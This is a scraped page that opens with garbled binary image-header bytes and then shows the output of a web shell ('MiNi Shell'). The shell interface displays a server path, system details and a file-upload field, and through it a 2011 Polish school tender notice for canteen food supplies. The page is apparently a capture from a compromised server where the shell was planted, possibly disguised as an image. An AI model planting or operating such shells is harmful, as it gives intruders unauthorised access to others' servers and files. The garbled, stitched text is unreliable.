JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111216/428590-N-2011.html

<p class="kh_header"><b>Wleń: Zespół Szkół im. Św. Jadwigi Śląskiej we Wleniu, z siedzibą przy ul. Dworcowej 10,                    59-610 Wleń,województwo: dolnośląskie, powiat lwówecki tel./fax. 75 7136369</b><br>
<b>Numer ogłoszenia: 428590 - 2011; data zamieszczenia: 16.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół im. św. Jadwigi Śląskiej , ul. Dworcowa 10, 59-610 Wleń, woj. dolnośląskie, tel. 0-75 713 63 69, faks 0-75 713 63 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zswlen.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: gminna jednostka organizacyjna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zespół Szkół im. Św. Jadwigi Śląskiej we Wleniu, z siedzibą przy ul. Dworcowej 10,                    59-610 Wleń,województwo: dolnośląskie, powiat lwówecki tel./fax. 75 7136369.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zakup i dostawa  żywności do stołówki szkolnej:
	Pakiet I -  Artykuły spożywcze, przyprawy, makarony, 
	Szczegółowy opis zamówienia zawiera załącznik Nr 2A
	Pakiet II -  Warzywa i owoce, warzywa przetworzone,
	Szczegółowy opis zamówienia zawiera załącznik Nr 2B 
	Pakiet III - Tłuszcze, sery, mleko, śmietana,   
	Szczegółowy opis zamówienia zawiera załącznik Nr 2C 
	Pakiet IV  - Mięso drobiowe, 
	Szczegółowy opis zamówienia zawiera załącznik  Nr 2D 
	Pakiet V - Mrożonki , ryby i przetwory z ryb,
	Szczegółowy opis zamówienia zawiera załącznik Nr 2E 
	Pakiet VI - Mięso  wieprzowe, wołowe, wyroby wędliniarskie,
	Szczegółowy opis zamówienia zawiera załącznik Nr 2F
	Pakiet VII - pieczywo   
	Szczegółowy opis zamówienia zawiera załącznik Nr 2G.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.10.00.00-9, 15.20.00.00-0, 15.60.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą wykonawcy, składający ważną i odpowiednią ofertę, którzy spełniają  następujące warunki:
a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy  nakładają obowiązek posiadania takich uprawnień;
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i  osobami zdolnymi do wykonania zamówienia;
c) znajdują się w sytuacji   ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
 d) nie podlegają wykluczeniu z postępowania o  udzielenie zamówienia.   
ponadto:
-	zadeklarują wykonywanie dostawy  w sposób ciągły  zapewniający utrzymanie  dziennego zapasu,
-	posiadają  środek transportu przystosowany do przewozu żywności,	
-	akceptują warunki projektu umowy,
-	akceptują warunki zawarte w niniejszej specyfikacji.
 Oferta zostanie odrzucona bez rozpatrywania gdy:
-	jest  niezgodna z ustawą ,
-	jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia,           z zastrzeżeniem art.87 ust.2 pkt.3
-	jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów                o zwalczaniu nieuczciwej konkurencji;
-	zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia;
-	została złożona przez wykonawcę wykluczonego z udziału w postępowaniu              o udzielenie zamówienia ;
-	zawiera błędy w obliczeniu  ceny;
-	wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził   się na poprawienie omyłki  o której mowa w art.87 ust.2 pkt.3
-	jest nieważna na podstawie odrębnych przepisów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniaja warunki dotyczące;
a.	posiadania uprawnień  do wykonania określonych prac lub czynności, jeżeli     
ustawy nakładają obowiązek ich posiadania ; 
b.	posiadania wiedzy i doświadczenia;     
c.	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
d.	sytuacji ekonomicznej i finansowej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"></ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Wypełniony formularz oferty (wg załącznika nr 1 do SIWZ).
Wykonawca winien wypełnić odpowiednie załączniki formularze cenowe zał. Nr 2A - 2G  ( wg pakietów) w zależności na które zadania składa ofertę.
Wypełniony arkusz kalkulacyjny (wg załącznika nr 3)
3.3 Aktualny odpis z  właściwego  rejestru albo aktualnego zaświadczenia o wpisie do  ewidencji działalności gospodarczej  jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
. W przypadku podmiotów występujących wspólnie wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego
W przypadku spółki cywilnej lub konsorcjum powyższy dokument (pkt. 3.3) powinien dołączyć każdy podmiot występujący wspólnie.

Zamawiający żąda przedłożenia następujących dokumentów, potwierdzających spełnienie warunków określonych w art.22 ustawy prawo zamówień publicznych:
a)	Oświadczenie o spełnieniu warunków określonych w art. 22 ustawy prawo zamówień publicznych oraz, że nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy - na formularzu stanowiącym ( załącznik nr 4 do SIWZ )
  Zaakceptowany  projekt umowy (załącznik nr 5 do SIWZ)</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> ww.zswlen.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół im. Św. Jadwigi Śląskiej
59-610 Wleń,  ul. Dworcowa 10
Tel.fax.- 75 7136369;  
pokój nr 111.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.01.2012 godzina 10:00, miejsce: Ofertę należy złożyć w zamkniętej kopercie w siedzibie zamawiającego we Wleniu , przy  ul. Dworcowej 10, pok. 109.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ARTYKUŁY SPOŻYWCZE - PRZYPRAWY, MAKARONY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Herbata czarna 100g	szt.	130
Cukier biały kryształ	kg	600
Kasza jęczmienna 500g	szt.	70
Kasza manna 0,5kg	szt.	40
Płatki śniadaniowe(400g) 	szt.	250
Ryż	kg	150
Mąka pszenna	kg	 250
Mąka ziemniaczana	kg	20
Zacierka	szt.	120
Dżem	szt.	400
Zupa w proszku Winiary  	szt.	250
Groszek konserwowy 400g	szt.	50
Sosy do mięsa Winiary	szt.	250
Sosy do sałatek 	szt.	100
Koncentrat pomidorowy 878g	szt.	180
Sól	kg	170
Warzywko	szt.	350
Kucharek 0,20kg	szt.	110
Pieprz naturalny 20g	szt.	200
Przyprawa w płynie Magii 1litr	szt.	80
Majeranek suszony 10g	szt.	10
Koper suszony 10g	szt.	70
Pietruszka suszona 10g	szt.	120
Musztarda 180g stołowa	szt.	250
Keczup Pudliszki 500g	szt.	150
Rosołki w kostce Winiary	szt.	100
Makaron           świderki,                       łazanka,                        wstążki	kgkgkg	350300150
Cukier puder 500g	szt.	45
Cukier waniliowy 20g	szt.	100
Ocet 0,5 l	szt.	20
Papryka słodka proszek	szt.	40
Ziele angielskie	szt.	40
Proszek do pieczenia	szt.	30
Pasztet drobiowy Prochowicki	szt.	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> WARZYWA I OWOCE ,WARZYWA PRZETWORZONE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ziemniaki	kg	6500			
Marchewka	kg	250			
Pietruszka	kg	110			
Seler	kg	60			
Cebula	kg	230			
Pora	kg	  50			
Szczypiorek	pęcz.	30			
Pietruszka natka	pęcz.	30			
Koperek	pęcz.	30			
Kapusta biała	kg	260			
Kapusta pekińska  włoska	kgkg	100100			
Ogórki zielone	kg	80			
Pieczarki	kg	100			
Burak czerwony	kg	850			
Rzodkiewka	pęcz.	60			
Groch (susz)	kg	60			
Fasola (puszka)	kg	80			
Pomidor	kg	250			
Sałata zielona	szt.	20			
Papryka świeża	kg	30			

Kalafior	szt.	50			
Ogórki konserwowe 900g	szt.	270			
Papryka konserwowa 950 g	szt.	30			
Kapusta czerwona  900 g 	szt.	20			
Kapusta kiszona	kg	550			
Przecier ogórkowy 300 g	szt.	60			
Szczaw w słoikach 300 g	szt.	40			
Cytryna	kg	10			
Jabłka	kg	120			
Banany	kg	200			
Mandarynki	kg	100			
Syrop zaprawa do napoi 500g Herbapol	szt.	400			
Jajka	szt.	4500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> TŁUSZCZE ,SERY,MLEKO,ŚMIETANA,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Masło	kg	150
Margaryna mleczna 500g	szt.	200
Olej uniwersalny	litr	180
Ser biały półtłusty	kg	250
Ser topiony  100g	szt.	650
Ser żółty Gouda	kg	 180
Mleko 2% folia	litr	1000
Śmietana 12% (kubek)	szt.	450
Śmietana 30%	szt.	100
Jogurt kubek 150g	szt.	2100
Majonez 400g	szt.	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> MIĘSO DROBIOWE (wędliny i wyroby wędliniarskie drobiowe).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ćwiartka  z kurczaka	kg	850
Udka z kurczaka	kg	250
Kurczak	kg	100
Porcje rosołowe	kg	120
Wątróbka z kurczaka	kg	10
Piersi z kurczaka	kg	20
Porcje rosołowe	kg	150
Kiełbasy drobiowe polędwica	kg	  40
Pasztet drobiowy w bloku	kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> MROŻONKI , RYBY I PRZETWORY Z RYB.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zupy mrożonki	kg	150
Paprykarz (konserw 300g)	szt.	30
Filet  mrożony (panierowany dorsz)	kg	230
Śledź matjas	kg	20
Tuńczyk w oleju (konserwa)	szt.	20
Pierogi ruskie	kg	100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> MIĘSO WIEPRZOWE ( wędliny , przetwory wieprzowe).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Schab bez kości	kg	430
Żeberka	kg	80
Karczek b/k	kg	250
Szynka b/k	kg	290
Szynka wędzona	kg	350
Szynka konserwowa	kg	30
Boczek wędzony	kg	30
Kiełbasa podsuszana (równorzędne żywieckiej)	kg	30
Kiełbasa grilowa	kg	200
Kiełbasa parówkowa	kg	150
Kiełbasa martadela	kg	50
 Mięso mielone 400g	szt.	700
Słonina	kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Chleb krojony 600 g	szt.	1000
Bułka pszenna zwykła 100g	szt.	4200
Bułka tarta zwykła 0,5kg	szt.	150
Chleb tostowy	szt.	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com